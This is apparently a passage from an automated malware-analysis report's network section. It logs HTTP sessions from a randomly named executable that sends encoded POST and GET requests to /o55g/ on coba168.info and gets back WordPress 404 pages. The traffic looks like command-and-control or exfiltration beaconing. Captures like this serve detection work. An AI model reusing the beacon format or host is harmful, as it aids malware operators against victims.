                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660347939 CEST1236INData Raw: 95 e0 b8 81 e0 b8 87 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 9e e0 b8 a3 e0 b9 89 e0 b8 ad e0 b8 a1 e0 b9 80 e0 b8 84 e0 b8 a3 e0 b8 94 e0 b8 b4 e0 b8 95 e0 b8 9f e0 b8 a3 e0 b8 b5 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70
                                                                                                                                                                                                                                              Data Ascii: " /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.coba168.info/#website","url":"https
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660372972 CEST1236INData Raw: 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 62 61 31 36 38 2e 69 6e 66 6f 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 7d 7d 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 2f 20 59 6f 61 73 74 20
                                                                                                                                                                                                                                              Data Ascii: {"@id":"https://www.coba168.info/#/schema/logo/image/"}}]}</script>... / Yoast SEO plugin. --><link rel="alternate" type="application/rss+xml" title="coba168
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660396099 CEST424INData Raw: 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c
                                                                                                                                                                                                                                              Data Ascii: width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.ca
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660480022 CEST1236INData Raw: 5c 75 32 36 61 37 5c 75 66 65 30 66 22 29 3f 21 31 3a 21 6e 28 65 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 64 38 33 63 5c 75 64 64 66 33 22 2c 22 5c 75 64 38 33 63 5c 75 64 64 66 61 5c 75 32 30 30 62 5c 75 64 38 33 63 5c 75 64 64 66 33 22
                                                                                                                                                                                                                                              Data Ascii: \u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc6
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660501957 CEST1236INData Raw: 7d 28 29 3b 69 66 28 21 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73 26 26 22 75 6e
                                                                                                                                                                                                                                              Data Ascii: }();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660530090 CEST1236INData Raw: 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69
                                                                                                                                                                                                                                              Data Ascii: id='wp-emoji-styles-inline-css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660553932 CEST1236INData Raw: 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 3a 20 23 66 37 38 64 61 37 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d
                                                                                                                                                                                                                                              Data Ascii: eset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.660581112 CEST1236INData Raw: 2c 31 30 35 2c 39 38 29 20 38 30 25 2c 72 67 62 28 32 35 34 2c 32 34 38 2c 37 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e
                                                                                                                                                                                                                                              Data Ascii: ,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45)
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:20.666141987 CEST1236INData Raw: 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 74 6c 69 6e 65
                                                                                                                                                                                                                                              Data Ascii: reset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5e


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              11192.168.2.549993118.139.178.37802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:22.009376049 CEST1777OUTPOST /o55g/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.coba168.info
                                                                                                                                                                                                                                              Origin: http://www.coba168.info
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.coba168.info/o55g/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 66 6c 46 67 62 58 61 5a 52 76 78 39 56 77 2f 33 55 33 71 36 70 73 69 6b 31 4f 2f 41 59 71 4f 55 4f 77 66 58 62 52 44 33 4c 68 54 2b 62 7a 45 35 48 47 55 74 53 62 76 32 68 72 36 39 4d 39 4d 35 47 74 67 68 69 6c 61 45 66 6e 62 37 46 55 54 68 71 57 50 6f 37 37 6e 4c 30 72 32 4e 4f 76 61 61 4f 69 4b 43 4c 53 31 46 72 54 67 66 4f 74 37 34 52 55 78 46 6d 64 4f 44 59 59 79 61 44 65 73 76 75 30 77 2b 32 48 36 36 2b 64 64 6c 74 47 68 32 48 4b 50 2b 45 30 4f 6c 4a 63 49 63 30 65 57 7a 70 4a 66 7a 34 46 4c 6d 6e 66 71 64 37 57 76 58 76 2b 2f 47 73 73 4d 7a 73 4f 30 69 30 6c 67 78 53 62 61 36 52 73 51 31 32 64 64 55 38 6f 59 38 51 79 6e 73 7a 51 31 66 38 73 75 43 7a 52 35 67 35 75 39 32 34 76 37 61 2f 42 2b 4e 72 36 6b 63 63 72 4f 79 58 6a 59 44 4f 78 64 5a 68 68 47 79 62 59 36 6d 62 53 62 5a 77 31 48 32 45 6a 6c 76 42 33 63 73 66 61 69 64 65 4f 36 75 7a 43 4b 33 77 6d 39 6e 74 6f 4e 74 58 57 33 65 2b 76 6b 4c 4b 70 37 37 76 32 34 33 34 51 6e 48 71 6b 78 4e 33 6d 75 6a 67 62 34 64 56 39 63 70 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=flFgbXaZRvx9Vw/3U3q6psik1O/AYqOUOwfXbRD3LhT+bzE5HGUtSbv2hr69M9M5GtghilaEfnb7FUThqWPo77nL0r2NOvaaOiKCLS1FrTgfOt74RUxFmdODYYyaDesvu0w+2H66+ddltGh2HKP+E0OlJcIc0eWzpJfz4FLmnfqd7WvXv+/GssMzsO0i0lgxSba6RsQ12ddU8oY8QynszQ1f8suCzR5g5u924v7a/B+Nr6kccrOyXjYDOxdZhhGybY6mbSbZw1H2EjlvB3csfaideO6uzCK3wm9ntoNtXW3e+vkLKp77v2434QnHqkxN3mujgb4dV9cp2kovbyv7IKcST5BrWCDoQbX6YCCsYPVXtPqTfKc88dn8UdG57a4krZAiHPyqtDY6QP4Mqrh8lB8U6He61Ozy96BwM1LtQ7n8LF7R+qAIyeWBo2wuSGfcPULOgTTCJ8VdOP7k6X9yHbPbzrwjC/9ZZYxVa6xOwDu4FaG6RhI7Tt9UFZPAfOJrCakEXntp0LBTelLqlL2bFNEUy5w2M2OFyZAMYRJZ8sJFgmVLdPa4DKgxs2wBhJLz/FrAcq6H7qDtswwhEjJaprmXbLxRBS7Hdo/mKkTHz8BhUoya14LqeJW06sAMlvaiuJHOIGjDi6ZpFwrnyoCJ0gLw60FZL59cZtWR5pAIMuYckJphqUjNyQyvr+XjA1vfJKwlSEOXlPJRKa8bd8/9i5ZrTAXnc/tN0jRSOnw5Qz+keKo9gHvZQLD3KEwpYJkjmXWIN+spGiL7W0HpAaxT1aGVNRGsKGS0tL4RK7hfc9byY+FdcSks5ViTuqI3uokpvHvdCQPWjc/BZ4s8hn2z3ZRGLB/Myg3CRsVZx6BNgWG5D77Du8v1OsNE/JwxIyYkbT0J+MUfbjNspSHtOUmw1eksw5oV8eoMHWIy5uedPTA2R3Kx0HuS3MgrpZ54Uzmmd2hS/FszhL3RpebjUgxvHhyxA/c+IHKqC0gaAhZ17FCWAq [TRUNCATED]
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198098898 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:22 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              X-Powered-By: PHP/8.2.23
                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                              Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 68 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 62 61 31 36 38 2e 69 6e 66 6f 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 4000<!DOCTYPE html><html lang="th"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="http://www.coba168.info/xmlrpc.php" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.7 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - coba168 </title><meta property="og:locale" content="th_TH" /><meta property="og:title" content="Page not found - coba168
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198165894 CEST212INData Raw: 95 e0 b8 81 e0 b8 87 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 9e e0 b8 a3 e0 b9 89 e0 b8 ad e0 b8 a1 e0 b9 80 e0 b8 84 e0 b8 a3 e0 b8 94 e0 b8 b4 e0 b8 95 e0 b8 9f e0 b8 a3 e0 b8 b5 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f
                                                                                                                                                                                                                                              Data Ascii: " /><meta property="og:site_name" content="coba168
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198184967 CEST1236INData Raw: 95 e0 b8 81 e0 b8 87 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 9e e0 b8 a3 e0 b9 89 e0 b8 ad e0 b8 a1 e0 b9 80 e0 b8 84 e0 b8 a3 e0 b8 94 e0 b8 b4 e0 b8 95 e0 b8 9f e0 b8 a3 e0 b8 b5 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70
                                                                                                                                                                                                                                              Data Ascii: " /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.coba168.info/#website","url":"https
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198210001 CEST1236INData Raw: 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 62 61 31 36 38 2e 69 6e 66 6f 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 7d 7d 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 2f 20 59 6f 61 73 74 20
                                                                                                                                                                                                                                              Data Ascii: {"@id":"https://www.coba168.info/#/schema/logo/image/"}}]}</script>... / Yoast SEO plugin. --><link rel="alternate" type="application/rss+xml" title="coba168
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198235035 CEST1236INData Raw: 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c
                                                                                                                                                                                                                                              Data Ascii: width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.ca
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198286057 CEST636INData Raw: 65 74 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67
                                                                                                                                                                                                                                              Data Ascii: ettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198327065 CEST1236INData Raw: 2e 74 6f 53 74 72 69 6e 67 28 29 2c 70 2e 74 6f 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29
                                                                                                                                                                                                                                              Data Ascii: .toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198344946 CEST212INData Raw: 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72
                                                                                                                                                                                                                                              Data Ascii: 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://www.coba168.info/wp-inclu
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198376894 CEST1236INData Raw: 64 65 73 2f 63 73 73 2f 64 69 73 74 2f 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2f 73 74 79 6c 65 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 36 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 63 6c 61 73
                                                                                                                                                                                                                                              Data Ascii: des/css/dist/block-library/style.min.css?ver=6.6.2' media='all' /><style id='classic-theme-styles-inline-css'>/*! This file is auto-generated */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.198405027 CEST1236INData Raw: 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61
                                                                                                                                                                                                                                              Data Ascii: urple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:23.203850985 CEST1236INData Raw: 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 34 35 2c 32 30 33 29 20 30 25 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25 2c 72 67 62 28 35 31 2c 31 36 37 2c 31 38 31 29 20
                                                                                                                                                                                                                                              Data Ascii: : linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              12192.168.2.549994118.139.178.37802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:24.558223963 CEST482OUTGET /o55g/?7Bohe=SntAYgquUuF8cmTqKgeHt96czNjKbI7walrzfjn5MBbpbz0DMUAQT5TGmaCmCOcjM4ET7TOvVUXTFF/O6lHSx5C+s9iWJ/mgfg63citE2SV2GP/8IEdknZeeY7ynAeJL4g==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.coba168.info
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.763803959 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:18:25 GMT
                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                              X-Powered-By: PHP/8.2.23
                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                              Link: <https://www.coba168.info/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 68 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 6f 62 61 31 36 38 2e 69 6e 66 6f 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 4000<!DOCTYPE html><html lang="th"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link rel="profile" href="http://gmpg.org/xfn/11" /><link rel="pingback" href="http://www.coba168.info/xmlrpc.php" /><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v23.7 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - coba168 </title><meta property="og:locale" content="th_TH" /><meta property="og:title" content="Page not found - coba168
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.763853073 CEST212INData Raw: 95 e0 b8 81 e0 b8 87 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 9e e0 b8 a3 e0 b9 89 e0 b8 ad e0 b8 a1 e0 b9 80 e0 b8 84 e0 b8 a3 e0 b8 94 e0 b8 b4 e0 b8 95 e0 b8 9f e0 b8 a3 e0 b8 b5 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f
                                                                                                                                                                                                                                              Data Ascii: " /><meta property="og:site_name" content="coba168
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.763912916 CEST1236INData Raw: 95 e0 b8 81 e0 b8 87 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 9e e0 b8 a3 e0 b9 89 e0 b8 ad e0 b8 a1 e0 b9 80 e0 b8 84 e0 b8 a3 e0 b8 94 e0 b8 b4 e0 b8 95 e0 b8 9f e0 b8 a3 e0 b8 b5 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70
                                                                                                                                                                                                                                              Data Ascii: " /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.coba168.info/#website","url":"https
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.763948917 CEST212INData Raw: 7b 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6f 62 61 31 36 38 2e 69 6e 66 6f 2f 23 2f 73 63 68 65 6d 61 2f 6c 6f 67 6f 2f 69 6d 61 67 65 2f 22 7d 7d 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 2f 20 59 6f 61 73 74 20
                                                                                                                                                                                                                                              Data Ascii: {"@id":"https://www.coba168.info/#/schema/logo/image/"}}]}</script>... / Yoast SEO plugin. --><link rel="alternate" type="application/rss+xml" title="coba168
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.763978958 CEST1236INData Raw: 84 e0 b8 b8 e0 b8 93 e0 b8 a0 e0 b8 b2 e0 b8 9e e0 b8 88 e0 b8 b2 e0 b8 81 e0 b8 84 e0 b9 88 e0 b8 b2 e0 b8 a2 e0 b8 94 e0 b8 b1 e0 b8 87 20 e0 b9 81 e0 b8 95 e0 b8 81 e0 b8 87 e0 b9 88 e0 b8 b2 e0 b8 a2 20 e0 b8 9e e0 b8 a3 e0 b9 89 e0 b8 ad e0
                                                                                                                                                                                                                                              Data Ascii: &raquo; " href="https://www.coba168.info/feed/" /><link rel="alternate" type="application/rss+xml" title="coba168
                                                                                                                                                                                                                                              Oct 24, 2024 15:18:25.764010906 CEST212INData Raw: 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65
                                                                                                                                                                                                                                              Data Ascii: ageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b
